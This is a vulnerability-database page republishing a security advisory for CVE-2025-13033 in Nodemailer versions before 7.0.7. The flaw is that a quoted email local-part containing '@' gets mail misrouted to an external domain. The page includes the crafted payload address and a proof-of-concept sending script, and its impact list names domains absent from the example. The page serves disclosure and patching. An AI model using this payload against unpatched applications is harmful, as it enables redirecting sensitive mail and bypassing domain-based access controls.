Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-mm7p-fcc7-pg87

Опубликовано: 07 окт. 2025
Источник: github
Github: Прошло ревью
CVSS4: 5.5

Описание

Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict

The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.

Payload: "xclow3n@gmail.com x"@internal.domain Using the following code to send mail

const nodemailer = require("nodemailer"); let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, }); let mailOptions = { from: '"Test Sender" <your_email@gmail.com>', to: "\"xclow3n@gmail.com x\"@internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", }; transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId); }); (async () => { const parser = await import("@sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */); if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; } console.log("Parsed email:", { address: `${parsed.localPart}@${parsed.domain}`, local: parsed.localPart, domain: parsed.domain, }); })();

Running the script and seeing how this mail is parsed according to RFC

Parsed email: { address: '"xclow3n@gmail.com x"@internal.domain', local: '"xclow3n@gmail.com x"', domain: 'internal.domain' }

But the email is sent to xclow3n@gmail.com

Image

Impact:

  • Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.

  • Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.

  • Potential compliance issue: Violates RFC 5321/5322 parsing rules.

  • Domain based access control bypass in downstream applications using your library to send mails

Recommendations

  • Fix parser to correctly treat quoted local-parts per RFC 5321/5322.

  • Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.

Ссылки

Пакеты

Наименование

nodemailer

npm
Затронутые версииВерсия исправления

< 7.0.7

7.0.7

EPSS

Процентиль: 21%
0.0007
Низкий

5.5 Medium

CVSS4

CVE ID

CVE-2025-13033

Дефекты

CWE-20
CWE-436

Связанные уязвимости

ubuntu логотип

CVE-2025-13033

CVSS3: 7.5
ubuntu
3 месяца назад

A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.

nvd логотип

CVE-2025-13033

CVSS3: 7.5
nvd
3 месяца назад

A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.

debian логотип

CVE-2025-13033

CVSS3: 7.5
debian
3 месяца назад

A vulnerability was identified in the email parsing library due to imp ...

EPSS

Процентиль: 21%
0.0007
Низкий

5.5 Medium

CVSS4

CVE ID

CVE-2025-13033

Дефекты

CWE-20
CWE-436